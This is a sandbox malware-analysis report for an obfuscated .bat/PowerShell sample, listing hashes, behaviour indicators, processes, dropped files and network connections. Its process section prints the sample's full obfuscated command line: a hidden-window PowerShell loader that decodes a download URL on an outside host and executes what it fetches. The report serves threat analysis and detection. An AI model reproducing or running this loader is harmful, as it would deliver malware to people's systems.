File name:

71495055c5c2f94dc782ef898fe46e8c3f33632b66f97d9cec5fc8591a6c98b0.bat

Full analysis: https://app.any.run/tasks/39827fa1-8b6b-4b9a-803e-da04bcba6a87
Verdict: Malicious activity
Analysis date: May 15, 2025, 13:33:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (6053), with no line terminators
MD5:

FDBAE2BFE61DE3B1F16AD48AAE430E17

SHA1:

0F8E6EB35AC71F83FEA365D1FE99055505464093

SHA256:

71495055C5C2F94DC782EF898FE46E8C3F33632B66F97D9CEC5FC8591A6C98B0

SSDEEP:

96:gjVGkWhs4pJh3LKv7Awb3DtENcKzoUMv2Op4KMrtYG5pzNQKyd85G5QdRrux:WVGk8s4vh7KvUwbRENcKX/KMrtYG7u8+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6036)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5776)
  • SUSPICIOUS

    • Suspicious use of asymmetric encryption in PowerShell

      • powershell.exe (PID: 6036)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6036)
    • Application launched itself

      • powershell.exe (PID: 6036)
    • Suspicious use of symmetric encryption in PowerShell

      • powershell.exe (PID: 6036)
  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5776)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
130
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Graph nodes: start, powershell.exe (no specs), conhost.exe (no specs), sppextcomobj.exe (no specs), powershell.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID:
3008
CMD:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path:
C:\Windows\System32\SppExtComObj.Exe
Parent process:
svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
5776"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "Get-Service;=[String](Get-Command A:).CommandType;Get-History;='Sanseindtryk';+=':';(ni -p -n Unfecund -value { param ();=4;do {+=[];+=5} until(![])});(ni -p -n Filefternavnet -value {param ();.() ()});ConvertTo-Html;=Unfecund 'Pingn Sn.eAntiTTo e.Astmw';+=Unfecund '.ctremo nBunteCFi hL lbeIPanteBjrgNJingT';=Unfecund 'RounMBanjosexbz uraiBetslK nklArboaMawn/';=Unfecund 'L,gnTHarplFlassInd,1 rso2';=' .nd[Lighn TraEBl.aT ad.UnciSAnimeTorsRI dsVKvinICoticSalvEVicipEmpaoSmugiD,agn.eklTSki mB sbaRi,oNCoroaEjecgM dseFinarEffr]Dek,:S mm: RegsNoduEUd.iCSekrUAmp rWag IAsseTOrgaypro PSubsRSc.por tttPhylOPseuC eliO FrilBogs= Con.issSC rasReinAOmstB udiEr rlArchiPrivTSelly';+=Unfecund ' Fre5Fina. Cau0St a Uk,u(PortWObjeiU.vunIndddSkitoCyt wLaunsGala Da aNSk,nTTuri orr1Udsi0Misg..ons0 Blo;Beln PrevWCrimiPrefnEeli6 .ri4Pa a;Karg LejexS lp6Hjde4Dunt;Ang ilr DamvPect:Fyr 1 Bri3 Unb7Vede.Unde0Tent) Ma. HornGKongeOverc Yngk PreoFici/Tol 2G.un0 O r1Prco0S er0 Ele1 Skr0 ev1Ka.p .croF iediIngrrPukeeKvajfForboE.trxtest/Nor.1Wick3 ,en7Dis .Poli0';=Unfecund 'unpiUB,esSExtie WitR Sep-OphoaSimugUmenEmam nTilgt';=Unfecund ' xpohUsmmt MegtLeddpKraks Bn :Afs./T,gg/SparqPhle- versrud tTasteTegneOutal ,te.Ins r,tiloMu i/PagaBcaprlSiamaRimet UndtTppeeCatcrBaaneDesidWind.Id opBdensNittd';=Unfecund 'La a>';=Unfecund 'GeroiMa,reNskex';='Navigatorisk';='\Jacamaralcyon.Tra';Filefternavnet (Unfecund 'Iron$ Famg.astlAtteOG idbKornAPeloLCirs:trylHQuaia Serw V,oc St UMikaB Fori tiltSpekeExp.=.ioc e: olaPrecPBussp.edsDu,esAUnlatgenuaAndi+N nr astpDispI GstLUsanfSkydg PanTIsbrEGartRTjuriC raENipsr');Filefternavnet (Unfecund '.odi agsLFinsONo.tbPrefaUnholHava:H poSL dok lorbnhriPlagVchroeMinibCaproDemoRLegudQuarSDortlSyt R prgdC ntoPostMAngeMKorte ramNSnad=zing RimMParcEGyl.l rouTSysteForsNStikD endESibyS Nve.PaadSSklmp CamLHnekI IncTe em(Panc yFMessiFrkklTiltmarkiaV.vlF TettCol,eAcq n reEOutgRE,kintrile A 
rsInca)');Filefternavnet (Unfecund );=[0];=(Unfecund ' Kok$ ptGOttelAxmaODramB nkiADi sLAfso: lacb hoaaUnf c riuK kosfDisfI Bl sSkppCO,alhUauteVolunTeniSundg=CreaNPanoEMnstWFre - HolononmbF,rpjS.enEBoreC StbTFirm UrosSBu,dY .ges BibtStreEUn,eMNu,l.Des ,frv Dage rinR TraNrvesaOpacLInteiBegyzRygee Burs');Filefternavnet ();Filefternavnet (Unfecund 'Nuch tec DiskEftefA.rsiA rssKaluc Myth Unwe P enJahvsEmba.FodeHUn oe Mena fled Ac,eGly,rOps s ass[Skin omnErh s RustMi diK rsfT ictDik.eM.rirTric] btt= loa,REnroeTartnO tsdPat iP rin Kupg');=Unfecund 'D,coDE sto Ko w NatnIntelFor o FolaI cid pgrFHyaliIdiolMorfe';=Unfecund 'Cran rrBNonaaHermcFascknathfs.naibregsSkracHalvhEsthe OolnUnprspala.Forb$ JorTBrokeSon rKremmVisoiweftnElekePre rRulle ,orn Rubd hoteChri.MisiIS ennDebuvYapno Nonk MedeNond(Cir. lUVervdEffesB.nemTraneT sslprobtMadeeMininNgtedB.tie Dk,sNon , Vol CendU.soaUnse)';=;Filefternavnet (Unfecund 'St,f$ UdsgAna lbahnOSystBLiv,aAarsl svr:UsagDSlukaOverSdenoSNormiSubaENon s F,r= ,ol( YeoT.isteLou sArbeTGema-TerrpS ndaSkilTMikrHUnda R.no aldUdvad seuaEm.g)');while (!) 
{Filefternavnet (Unfecund 'Lusk,aPasslFang: .ubB O.ou DetgT rpaHistb ForoTheooimprsAcuc2 Pr 0 ,ei2Sear=Curd$ harTcistjKobbeAcrinAc usste tB deg TilrKnsreAmeenBe vdSchee Bras') ;Filefternavnet ;Filefternavnet (Unfecund 'Radi[ ,aktSweaH IneR ,icE DisAHoveDProrISpirncresg Lys.forbTMeddh SprrTymoEundeAAnslDnonv]Nedv: Out:SammsUd kL ,rge SlaEGw.npSa k(pl j4 Pas0Unpe0Thu 0Stim)');Filefternavnet (Unfecund 'Bram Ha lFebeo alibSkndA InfLMalt: Katd Sk a CassGus S.orsiEpidESu eSUter=Besn(Frdit ValE IneS DecT.iba-PharpmobtAF,rmTFu.th Sti U ce SpaIBogkDUndedSpreABu.b)') ;Filefternavnet (Unfecund ' ei.aG ,enlRutiO BanBUkreaFil lC.rv:Jar FungrDRancS palE O,glBorgS SomKGruboNan.NSykuTFyriR FasODee,LRundLSkifETrepR ValnFadsEInfiS Und=Deno$ A,rgK epL S.joGlooB agaSnowLDemi: R fGo dia ailR smeD Na,eexcehSkunUpe.is ffjAskrurClimE indRRemm1 ,nr3 Sek0S,rr+,epp+Soeg%% Rhy CopkI.trrForeI eppVImitE niB koloTeewrSi pdJ niSGas,L FerR cu,DKaraoPrecMFol mStatEJ,ltNProt.FastCGerio Ek uTypen mpT') ;=[]}=399123;=31866;Filefternavnet (Unfecund 'M cl gConqlFr noSkadbS staPl gLApp :turrC Af OLaa NTilbFProlICleat KysEPrivoOrgirR bb Sten=Carm Ynk G UnheAr hT Kva-S.incforbOUnmynEn,rt,itrE Fenn ulltVing Flag SanDYnd a');Filefternavnet (Unfecund ' man,lFavro Zulb,olta S bl Ko :FlagLRivei Bord una Butt= Spa Dem [ AmpSProdyR,mnsCramtKamee ImpmLi,n.B syCSkatoEc on ellvUntoeCervr HaatSeks]Savl:.xoc:K,nsFSkvtrTallo SupmPrisBBu.sa F.rsZoogeRens6Anco4Cu rSaf.etTen,r t.yi NysnFljtgCoha( Mar lvo Trans.ldfFebrihjbotBunde nuoM,dhrUd,k)');Filefternavnet (Unfecund 'Conj FreoMaalBSumpaTraiLSola: Pa l TiteChalUSvark Ab oF,dbS To,E.tivSDupz Hypo=Di p Fonz[Con SFascYGlosS vertForte .somSed..TremT ToleCyanXSandtMul .Bygge SunnUphhCBuc oSkydDupstI ,irNStraGAn.p]Un.u: she:pag.AJak,s Delc TaxITel.i las.A itG ouneB.vaTArbeSAccoTQu nr Ud.ILektnRudeGJaco(Fo i Keri UtiD Mor)');Filefternavnet (Unfecund 'Pyro GirO SquBNonmAEgyplBid,: etrtBu.gePic M onaPFerreTranlHenlkRango Wh mSnydpNo,iLRygreGrd.kS mmsPrefemer R,onpSSnrk= tin to 
OpfsCakeeElsas ost.Checs aiuConfBS.ppSWeretr derRenniA caNObamGarbe(Adia,sB SplAVi.d, arq tanu OveaTilvl BogiBureTcrimeGallt stue HumnS mf)');Filefternavnet ;"
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\uxtheme.dll
PID:
6036
CMD:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\71495055c5c2f94dc782ef898fe46e8c3f33632b66f97d9cec5fc8591a6c98b0.bat.ps1
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
6244
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
4 146
Read events
4 146
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID:
6036
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10e3f9.TMP
Type:
binary
MD5: D040F64E9E7A2BB91ABCA5613424598E
SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670

PID:
6036
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0jcrde4g.yjc.psm1
Type:
text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID:
5776
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nhuqjvww.gtn.ps1
Type:
text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID:
5776
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fc3eti1t.yke.psm1
Type:
text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID:
6036
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Type:
binary
MD5: D034A9FE410CC2700ED0D63A9970C905
SHA256: F25588F63595DFBC58448349ADB9AEE7F8439421C9E151FB4D8B64576197E97D

PID:
6036
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hqyi5hqu.owj.ps1
Type:
text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID:
6036
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PNHLGU38SLUZ3B756AB6.temp
Type:
binary
MD5: D034A9FE410CC2700ED0D63A9970C905
SHA256: F25588F63595DFBC58448349ADB9AEE7F8439421C9E151FB4D8B64576197E97D

PID:
5776
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type:
binary
MD5: DE155EDBA893333E1781D73AED91303A
SHA256: F0B137B05B6F85BF2DBBC4584C696E8A94466CE608021BBCA7A54F10ECCEA24F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
13
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4932
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4932
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4
System
192.168.100.255:138
whitelisted
6544
svchost.exe
40.126.31.128:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:137
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.206
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.167
  • 23.48.23.177
  • 23.48.23.173
  • 23.48.23.145
  • 23.48.23.194
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 40.126.31.128
  • 20.190.159.75
  • 20.190.159.68
  • 40.126.31.0
  • 20.190.159.129
  • 20.190.159.73
  • 40.126.31.73
  • 20.190.159.131
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.43
whitelisted

Threats

No threats detected
No debug info